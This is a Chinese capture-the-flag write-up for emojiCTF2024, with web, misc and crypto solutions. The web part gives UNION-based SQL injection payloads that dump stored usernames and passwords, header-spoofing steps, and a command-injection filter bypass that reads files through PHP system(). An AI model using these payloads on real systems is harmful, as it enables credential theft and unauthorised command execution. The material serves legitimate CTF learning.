emojiCTF2024

emojiCTF2024

WEB

http

题目:

思路:

  1. 修改 UA 头为 EMOJI_CTF_User_Agent_v1.0:User-Agent: EMOJI_CTF_User_Agent_v1.0

  2. 修改 http 方法,试了一下,修改成 PUT,可以

  3. 添加一个自定义头部,EMOJI-CTF-Auth: Passw0rd!

  4. 抓包修改就行,成功后在路径上加个 fl1l1l1l1ag.php 就行

e4_sql

**题目:**一个登入页面

**思路:**看题目可以猜测是一个 sql注入的题

学习: 从0到1,SQL注入(sql十大注入类型)收藏这一篇就够了,技术解析与实战演练 - FreeBuf网络安全行业门户

exp:

  1. 先加单引号**'** 、双引号**"** 、单括号**)** 、双括号**))** 等看看是否报错
  • 可以发现使用 " 会报错
  1. 使用 union 查询注入
    • 可以通过order by来判断当前表的列数
    • username=1" order by 2--+&password=1&submit=提交查询
    • 当 order by 为 2 时不会报错,说明有 2 列
    • 通过union select 来判断显示的信息是第几列的信息

      可以知道第一列,第二列是回显列
    • 接下来可以在这两个位置插入一些函数
    • version():查询数据库的版本
      user():查询数据库的使用者
      database():数据库
      system_user():系统用户名
      session_user():连接数据库的用户名
      current_user:当前用户名
      load_file:读取本地文件
      @@datadir:读取数据库路径
      @@basedir:mysql安装路径
      @@version_complie_os:查看操作系统
    • 我们先查看一下当前数据库的名称。
    • -1" union select database(), 2#
    • 接下来就是查看当前数据库的所有的表。
    • -1" union select group_concat(table_name), 2 from information_schema.tables where table_schema='students'#
    • 然后可以查看表中的字段
    • -1" union select group_concat(column_name), 2 from information_schema.columns where table_name='information
    • 最后使用 group_concat()拼接账号密码,即可爆出所有数据
    • 1" union select group_concat(username), group_concat(password) from students.information#
    • 1" union select group_concat(username, '--', password), 2 from students.information#

easy_web

题目:

学习: Cloudflare HTTP 请求标头 ·Cloudflare 基础知识文档

exp:

  1. 根基提示修改 User-Agent 头
  1. 添加 cf-connecting-ip: 内容随便,表示流量来自 cf 网络
  1. 添加 cf-ipcountry: T1 表示来自洋葱网络

rce

exp:

  1. 一开始直接把 f12 和 右键给禁用了,利用 curl 查看页面源码
  • 可以看到有个提示,还有禁用功能都在 js 代码里面,所以直接用插件禁用 js 代码就行
  1. 根据提示我们猜测存在 robots.txt 协议,访问一下
  • User-agent: *
    Disallow:
    Disallow: /fl@g.php
  • 直接访问 /fl@g.php
  1. 出现 rce 题目
  • <?php

    highlight_file(FILE);
    error_reporting(0);
    if(isset(_GET\['emo'\])){ emo = _GET\['emo'\]; if(!preg_match("/\\;\|\\"\|\\\*\| \|\[b-h\]\|\[m-r\]\|\\\\|\{|\}|\^|\>/i",emo)){ system(emo);
    }
    else{
    echo "Again";
    }
    }
    else{
    echo "Try";
    }
    ?>
    Try

  • 可以发现这个正则过滤了一些字符和数字,但是发现可以使用 tail 命令,flag 在 flag.txt 下,所以构造 flag.txt 为 ??a?.txt 就行

  • payload:?emo=tail%09??a?.txt

misc

emoji

题目:

def emoji_to(emos):

list = []

for emo in emos:

code = ord(emo)

list.append(code)

return list

if name == "main":

emos = []

converted = emoji_to(emos)

print(converted)

'''ono'''

'''[128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]'''

exp:

enc = [128093, 128099, 128088, 128094, 128114, 128092, 128100, 128039, 128097, 128096, 128086, 128040, 128106, 128086, 128106, 128102, 128086, 128043, 128108, 128101, 128116]

for emo in enc:

code = chr(emo)

print(code, end='')

👝👣👘👞👲👜👤🐧👡👠👖🐨👪👖👪👦👖🐫👬👥👴

进行 base100 解密 flag{em0ji_1s_so_4un}

ez_png

lsb 隐写最高位

keyboard

exp:

import os

import subprocess

import json

command = 'tshark -r misc01.pcap -T json -e usb.capdata > 1.json'

proc = subprocess.Popen(command, shell=True,

stdout=subprocess.PIPE, stderr=subprocess.PIPE)

proc.communicate()

with open("1.json","r") as f:

data=json.load(f)

a2=[]

for i in data:

try:

a1=i['_source']['layers']['usb.capdata'][0]

a2.append(a1)

except:

continue

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

nums = []

for line in a2:

if len(line)!=16:

continue

nums.append(line[0:2]+line[4:6]) #????????×???

output = []

for n in nums:

if n[2:4] == "00" :

continue

if n[2:4] in normalKeys:

if n[0:2]=="02":

output.append(shiftKeys[n[2:4]])

else :

output.append(normalKeys[n[2:4]])

else:

output += '[unknown]'

print("".join(output))

flag = 0

#去除键盘标志

for i in range(len(output)):

try:

a = output.index('<DEL>')

del output[a]

del output[a - 1]

except:

pass

for i in range(len(output)):

try:

if output[i] == "<CAP>":

flag += 1

output.pop(i)

if flag == 2:

flag = 0

if flag != 0:

output[i] = output[i].upper()

except:

pass

print('\n[+] 键盘数据output :' + "".join(output))

Time to say good bye

看题目跟时间有关,下载压缩吧,查看修改的时间,将 时,分,秒都加起来

exp:

enc = [101, 122, 95, 116, 105, 109, 101, 95, 102, 108, 97, 103]

flag = ''

for i in enc:

flag += chr(i)

print("flag{" + flag + "}")

排列的emoji

提示:

题目中每个emoji的位置代表了一个数字

题目.png中的emoji们从0开始依次排列

所以附件中 题目.png 中从第一个表情包到最后一个分别对应 0-28

然后在 flag.png 中与题目.png 中对应的表情包,flag其中一个值就是题目中表情包对应的数字

22 28 9 0 9 12 18 18 20 2 1 21 16 17 12

拼接后外加 emojiCTF{}包裹即可

crypto

Crypto签到

题目:

0111001001111010011000100111011101110110010100000100011101010011011110110011000101100111010111110101011000110101010111110100111001100001010111110011001101101110010001100110110001011111010100000110010101101100010000110011011100110000010111110100011000110001011101000110000101111101

exp:

二进制转字符 --> rot13

from Crypto.Util.number import *

enc = '0111001001111010011000100111011101110110010100000100011101010011011110110011000101100111010111110101011000110101010111110100111001100001010111110011001101101110010001100110110001011111010100000110010101101100010000110011011100110000010111110100011000110001011101000110000101111101'

将为进制转换为整数

dec = int(enc, 2)

flag = long_to_bytes(dec)

print(flag)

def rot13_decrypt(ciphertext: str) -> str:

plaintext = ""

for c in ciphertext:

if c.isalpha():

if c.isupper():

new_ascii = (ord(c) - 65 - 13) % 26 + 65

else:

new_ascii = (ord(c) - 97 - 13) % 26 + 97

plaintext += chr(new_ascii)

else:

plaintext += c

return plaintext

print(rot13_decrypt(str(flag)))

R-S-A

题目:

p - q = 51381142775123519349290842945954274580308036864833813854518667530683074791528855065573311829064575429550695992712161535668690910376488119177444214532772299263813115708402904509064375525967659216705876400172136741252680461938366775871018879167930797844072849531689946887067061345054021414317442978909873431432

e = 5225117248377988039655379128319150077859212934479249106737486739841945990119030544483834218789132807494439337838722381748201488025663572902443745269513357567064949797856467277642098184847862936652531624006564533365057184580113159303769716605342618917621849289122477649668049861242051731235400274673369715185929461710808907086352718304908535419637590480240782454240193336822937420170146789227817878466035975551185922793800896315593349978830810109251896877118462696997647649687619749451393345196441509893127472602159092230981776655601188254148211714671366824595177858349795798935210212171711571686450342086114308279775

c = 5096802794067909399631070291061036883003251009733561718565301240530683996637558268862754768610772334859286979497609362887800342254233908277806805731048110605134988754881255797110077475855038484248550561905351466922459106270040642960139799680279483887089069491414859963358324232369743786636886518163255743584731582668652875248748687944703294074212335773710495297350517247747144316642664568035623400442348053088693002811114631474724618587978104831200115528723560987856607406344549973030722066724325224073315550806312625166541589981512950907915397666968693474796966588529757194015313484765435220314082987357142001956757

n = 11094312652845413370472063156504593356245783915712382183873058441912628576646985317615181958529218995363059130948329828846648576066452583733289212104510014589754649621827029681702577715982792405635377435950330814783423867048695569469595422768706674732425724822380113771551340820956053992116083822132378740249597961852763729891128004360901421176876654717519340632937726141820709407642563925629474023368069834875410829861919317556759877281815886175118210882645661925635793782557984754985291423981293553208990730975259251416013521878384201154137890104130350536081998927643730552824578015057078616465353129433335462203953

思如:

已知 p-q 和 p*q,解方程求 p,q

exp:

from Crypto.Util.number import *

from gmpy2 import *

from sympy import *

x = p - q

x = 51381142775123519349290842945954274580308036864833813854518667530683074791528855065573311829064575429550695992712161535668690910376488119177444214532772299263813115708402904509064375525967659216705876400172136741252680461938366775871018879167930797844072849531689946887067061345054021414317442978909873431432

e = 5225117248377988039655379128319150077859212934479249106737486739841945990119030544483834218789132807494439337838722381748201488025663572902443745269513357567064949797856467277642098184847862936652531624006564533365057184580113159303769716605342618917621849289122477649668049861242051731235400274673369715185929461710808907086352718304908535419637590480240782454240193336822937420170146789227817878466035975551185922793800896315593349978830810109251896877118462696997647649687619749451393345196441509893127472602159092230981776655601188254148211714671366824595177858349795798935210212171711571686450342086114308279775

c = 5096802794067909399631070291061036883003251009733561718565301240530683996637558268862754768610772334859286979497609362887800342254233908277806805731048110605134988754881255797110077475855038484248550561905351466922459106270040642960139799680279483887089069491414859963358324232369743786636886518163255743584731582668652875248748687944703294074212335773710495297350517247747144316642664568035623400442348053088693002811114631474724618587978104831200115528723560987856607406344549973030722066724325224073315550806312625166541589981512950907915397666968693474796966588529757194015313484765435220314082987357142001956757

n = 11094312652845413370472063156504593356245783915712382183873058441912628576646985317615181958529218995363059130948329828846648576066452583733289212104510014589754649621827029681702577715982792405635377435950330814783423867048695569469595422768706674732425724822380113771551340820956053992116083822132378740249597961852763729891128004360901421176876654717519340632937726141820709407642563925629474023368069834875410829861919317556759877281815886175118210882645661925635793782557984754985291423981293553208990730975259251416013521878384201154137890104130350536081998927643730552824578015057078616465353129433335462203953

p, q = symbols('p q ')

eq1 = Eq(p -q - x, 0)

eq2 = Eq(n - p * q, 0)

solution = solve((eq1, eq2), (p, q))

p = -solution[0][0]

q = -solution[0][1]

phi = (p-1)*(q-1)

d = gmpy2.invert(int(e), int(phi))

m = pow(c, d, n)

print(long_to_bytes(m))

小小的e也很可爱的说^_^

题目:

n1 = 3216625489003699414830922622659690578204800327916982699405268891717403349894771673890260015201355111498284203259570408665534576128833243309618014794143167

c1 = 2095483572526116955065664549822756705395623414347013343494731998292904423929716007610957601040459809235415919982443482178722717749401972298933813284657834

n2 = 933390768672044510791517336856045671497735302993687720820364489315385792028289422929884364105857508700176904472351671251410314503145794961562431662069941

c2 = 684908493503306632360989553131625272663550454833432439984590609211630052087461972672458891301696799582829072300009235498405743267623563585482604150106076

n3 = 1615957147760064536288349927944312857866170026271775545149534254297441421349024330081047666522119531797192904444173977682219457742135047978669999078260993

c3 = 1424622136498444921299987129464477621988911670536059321251166110337676320810541516167809784538368673496668637940336373606830635479395222353109896203380634

n4 = 1762259470193072487827330614524320959647626497422681386635061681478198224897606319929300903824610648073693250132103837276558587559686097627176271765181227

c4 = 287156557324829792565769983980147125587186024534790659751644057753643939964481385027311147476297689715200071180855937207780037108413444021397228819070798

n5 = 612607140560709369395967204266593565116071455393681371829848303550418759245767816766735713756324794837529317673802722196925564145659288464359726463452289

c5 = 324264480554870012460939049461155373385769686439769922165829604858050878733481196262451122450312004610803437715708593381865252338127481139481958786610181

n6 = 134620612960363495156489285470118713372042939284823354434683657762717171905549799261066194504979201481505547191922396805151332619666144780043695695800601

c6 = 133804104077443913982936458561393869134885500741152642309743632700641023483231896938359118110787162177643042807580889838383218066039071970924163104120035

n7 = 9290853325306498217851550733162499097174811955383580952850759447863044628369651833286265385925348182761877936633964688565167809200196221443330095911517537

c7 = 2904451029928603089211895489230472440713728144943684333064222386646663912959798692601596895606731578723993039912604114087602417008366097780899801981810063

n8 = 575354134612989509428157334107039600312427930095559648738826339753690526763901518701543005569721206959962647255946972489105760956661445156557660124603167

c8 = 564395600559898953179470555724351819693634832619460693901032426663554292646554729122349220814865769290148938243865030380254403496031383480394393165419707

n9 = 10363079046333510437571849453120718094086916215139788898416020248556417321887233420439502978909627661853687599297835463131897655165041698412507566978095137

c9 = 1089506006415960766662714519740492862463940684220605246290290586295598785869233567034634559203538350847999183570289519019696458514496000603233363718013482

n10 = 8236337053294049383066679907238165911947055214830668318528929554883122897464177062333399338281033852003196128858124816730757758439739855308686153128049913

c10 = 1179785682243987329317974549209326195294600555539416151706700891370376389719564860092609626711985092873906550866012353266902876608015836164442652254193424

n11 = 1054938629047140039799228522203477702102924731364885262147645477957949173988325619180344814162800687765136867781881428701950577456240042902006247187651281

c11 = 842979638178316902608935819889823454227624865551011520535046447260264110785109747291361646371951464995656677058010397254038669686832059281628205139290307

n12 = 1313441585810179377726176453285403909090708985238365216430605371281306094902419782652501673922477563456851868212996625500834103345812508060358951340579483

c12 = 814740706185262859767353341701615730073472806307599112765484426183826692848073300977932345144214581484703678997056593489723043504597609250412826611605974

n13 = 894660568765678819833822357685390749243314450224522256655308436327373935340405944749642449612780899529906157168678756797556379602111849244417178324709993

c13 = 852316993270303760914317867581823752268420063356368929291112063020666656106388659682793059578812571539060722842086553782077742353691233031503277202017507

n14 = 2135681936697070302150000064929404175663025489241115860743514205053275087620605805722940655397714215446348665146833635819758981363462724519773158516138257

c14 = 1080797421242057724136738163738667763765623130422728503309344153560056109626117825421971828157336754785375011871755210922645179107603650800049897813706246

n15 = 1908738274860219724777870824235328288448052704900748317790309471275667155048925300669101964846610863447848169276542224186433023832754911670514852203658831

c15 = 768848698831498791900737874953545923334075081642986390260218565310354824308195667494183791395262559934994128372034431503174678070901697330722626017143840

n16 = 7830494813970233610498273642412240512392494083378852241841198719022303713885861533318582206773823433197665643909447571626834714050749413748655026757410529

c16 = 2833745743858416594482153319045028292316832869179623551200538522488362608028302084052751220300819919278182960400817379120757495742489094162968061728661176

思路:

给了多组 n,c 利用 crt 求出 m^e,然后题目说了 e 很小,然后爆破 e 就行了

exp:

from Crypto.Util.number import *

from sympy.ntheory.modular import crt

from gmpy2 import *

n1 = 3216625489003699414830922622659690578204800327916982699405268891717403349894771673890260015201355111498284203259570408665534576128833243309618014794143167

c1 = 2095483572526116955065664549822756705395623414347013343494731998292904423929716007610957601040459809235415919982443482178722717749401972298933813284657834

n2 = 933390768672044510791517336856045671497735302993687720820364489315385792028289422929884364105857508700176904472351671251410314503145794961562431662069941

c2 = 684908493503306632360989553131625272663550454833432439984590609211630052087461972672458891301696799582829072300009235498405743267623563585482604150106076

n3 = 1615957147760064536288349927944312857866170026271775545149534254297441421349024330081047666522119531797192904444173977682219457742135047978669999078260993

c3 = 1424622136498444921299987129464477621988911670536059321251166110337676320810541516167809784538368673496668637940336373606830635479395222353109896203380634

n4 = 1762259470193072487827330614524320959647626497422681386635061681478198224897606319929300903824610648073693250132103837276558587559686097627176271765181227

c4 = 287156557324829792565769983980147125587186024534790659751644057753643939964481385027311147476297689715200071180855937207780037108413444021397228819070798

n5 = 612607140560709369395967204266593565116071455393681371829848303550418759245767816766735713756324794837529317673802722196925564145659288464359726463452289

c5 = 324264480554870012460939049461155373385769686439769922165829604858050878733481196262451122450312004610803437715708593381865252338127481139481958786610181

n6 = 134620612960363495156489285470118713372042939284823354434683657762717171905549799261066194504979201481505547191922396805151332619666144780043695695800601

c6 = 133804104077443913982936458561393869134885500741152642309743632700641023483231896938359118110787162177643042807580889838383218066039071970924163104120035

n7 = 9290853325306498217851550733162499097174811955383580952850759447863044628369651833286265385925348182761877936633964688565167809200196221443330095911517537

c7 = 2904451029928603089211895489230472440713728144943684333064222386646663912959798692601596895606731578723993039912604114087602417008366097780899801981810063

n8 = 575354134612989509428157334107039600312427930095559648738826339753690526763901518701543005569721206959962647255946972489105760956661445156557660124603167

c8 = 564395600559898953179470555724351819693634832619460693901032426663554292646554729122349220814865769290148938243865030380254403496031383480394393165419707

n9 = 10363079046333510437571849453120718094086916215139788898416020248556417321887233420439502978909627661853687599297835463131897655165041698412507566978095137

c9 = 1089506006415960766662714519740492862463940684220605246290290586295598785869233567034634559203538350847999183570289519019696458514496000603233363718013482

n10 = 8236337053294049383066679907238165911947055214830668318528929554883122897464177062333399338281033852003196128858124816730757758439739855308686153128049913

c10 = 1179785682243987329317974549209326195294600555539416151706700891370376389719564860092609626711985092873906550866012353266902876608015836164442652254193424

n11 = 1054938629047140039799228522203477702102924731364885262147645477957949173988325619180344814162800687765136867781881428701950577456240042902006247187651281

c11 = 842979638178316902608935819889823454227624865551011520535046447260264110785109747291361646371951464995656677058010397254038669686832059281628205139290307

n12 = 1313441585810179377726176453285403909090708985238365216430605371281306094902419782652501673922477563456851868212996625500834103345812508060358951340579483

c12 = 814740706185262859767353341701615730073472806307599112765484426183826692848073300977932345144214581484703678997056593489723043504597609250412826611605974

n13 = 894660568765678819833822357685390749243314450224522256655308436327373935340405944749642449612780899529906157168678756797556379602111849244417178324709993

c13 = 852316993270303760914317867581823752268420063356368929291112063020666656106388659682793059578812571539060722842086553782077742353691233031503277202017507

n14 = 2135681936697070302150000064929404175663025489241115860743514205053275087620605805722940655397714215446348665146833635819758981363462724519773158516138257

c14 = 1080797421242057724136738163738667763765623130422728503309344153560056109626117825421971828157336754785375011871755210922645179107603650800049897813706246

n15 = 1908738274860219724777870824235328288448052704900748317790309471275667155048925300669101964846610863447848169276542224186433023832754911670514852203658831

c15 = 768848698831498791900737874953545923334075081642986390260218565310354824308195667494183791395262559934994128372034431503174678070901697330722626017143840

n16 = 7830494813970233610498273642412240512392494083378852241841198719022303713885861533318582206773823433197665643909447571626834714050749413748655026757410529

c16 = 2833745743858416594482153319045028292316832869179623551200538522488362608028302084052751220300819919278182960400817379120757495742489094162968061728661176

n=[n1,n2,n3,n4,n5,n6,n7,n8,n9,n10,n11,n12,n13,n14,n15,n16]

c=[c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16]

m = crt(n,c)[0]

for e in range(1, 10):

flag = gmpy2.iroot(m, e)[0]

flag = long_to_bytes(flag)

if 'emojiCTF' in str(flag):

print(e)

print(flag)

R^S^A

题目:

e = 65537

n = 17626392212279375795672017937809976432819563702015014286064950438576962829301599887424832742209378051687822421703316130192020970941676594734073337248659576926575409659609517516571173738767919910420753227081676651612998092451924002173008602428197941864705971469948068681614565308570894501692597579202715649837935866803849514492857112054684416002104812289864567355883456430042148145799939586951625034025707736407538180102611049391900268512837878848560854682228074168583637013599117615137668041018375469762511166636852906124939919673060420023287056647653925858064479788117341253962554259945839612998710315288660915390543)

p ^ q = 89884656743115795386465259394234594567546130199363180708002290807487206865805972417279697354950018128772500146302322028511803484668179089220615193364070482772703954931838536681720469410883560665407216805250546708783249336389502139655454481491246187888957907623426449041503701395627092371546762192998918782974

c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427

思如 :

一道板子题吧,原理就是利用 dfs 剪枝

学习: Crypto趣题-剪枝 | 糖醋小鸡块的blog (tangcuxiaojikuai.xyz)

exp:

from Crypto.Util.number import *

from gmpy2 import *

e = 65537

n = 17626392212279375795672017937809976432819563702015014286064950438576962829301599887424832742209378051687822421703316130192020970941676594734073337248659576926575409659609517516571173738767919910420753227081676651612998092451924002173008602428197941864705971469948068681614565308570894501692597579202715649837935866803849514492857112054684416002104812289864567355883456430042148145799939586951625034025707736407538180102611049391900268512837878848560854682228074168583637013599117615137668041018375469762511166636852906124939919673060420023287056647653925858064479788117341253962554259945839612998710315288660915390543

x = p ^ q

x= 89884656743115795386465259394234594567546130199363180708002290807487206865805972417279697354950018128772500146302322028511803484668179089220615193364070482772703954931838536681720469410883560665407216805250546708783249336389502139655454481491246187888957907623426449041503701395627092371546762192998918782974

c = 15353396223606692204253354833233067114199996528916790997604347786403456282543682138297916126293312135032558534636934734869807941321225203411903129720253717772393747501562673454929926513518070604475902448091242766771949079887693901769148980379739977262744450451505364499178273015141584500087580192421701748750836209109487246092666869218702274453456508100997255478700791800921353303116505094139865456937359493463506797519849430510917719026559539965791391845554621890357123251984800601113044355173099746170929775677870786702159862756844911828296490556988779325757045280115604388611000559427604324936039138667153453277427

def get_pq(n, x):

a = [0]

b = [0]

maskx = 1

maskn = 2

for i in range(1024):

xbit = (x & maskx) >> i

nbit = n % maskn

t_a = []

t_b = []

for j in range(len(a)):

for aa in range(2):

for bb in range(2):

if aa ^ bb == xbit:

tmp2 = n % maskn

tmp1 = (aa * maskn // 2 + a[j]) * (bb * maskn // 2 + b[j]) % maskn

if tmp1 == tmp2:

t_a.append(aa * maskn // 2 + a[j])

t_b.append(bb * maskn // 2 + b[j])

maskx *= 2

maskn *= 2

a = t_a

b = t_b

for a1, b1 in zip(a, b):

if a1 * b1 == n:

return a1, b1

p = get_pq(n, x)[0]

q = get_pq(n, x)[1]

phi = (p-1) * (q-1)

d = inverse(e, phi)

m = pow(c, d, n)

print(long_to_bytes(m))

相关推荐
centos0814 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
Sweet_vinegar19 小时前
变异凯撒(Crypto)
算法·安全·ctf·buuctf
Mr_Fmnwon20 小时前
【我的 PWN 学习手札】House of Roman
pwn·ctf·heap
真学不来3 天前
ACTF新生赛2020:NTFS数据流
网络·笔记·python·安全·ctf
安红豆.3 天前
[NewStarCTF 2023 公开赛道]逃1
web安全·网络安全·ctf
A5rZ3 天前
CTF-WEB: python模板注入
ctf
梦 & 醒3 天前
【刷题11】CTFHub技能树sql注入系列
数据库·sql·网络安全·ctf
真学不来7 天前
GXYCTF2019:gakki
笔记·python·安全·ctf
安红豆.8 天前
[Zer0pts2020]Can you guess it?1
web安全·网络安全·php·ctf
Gnevergiveup9 天前
源鲁杯2024赛题复现Web Misc部分WP
安全·网络安全·ctf·misc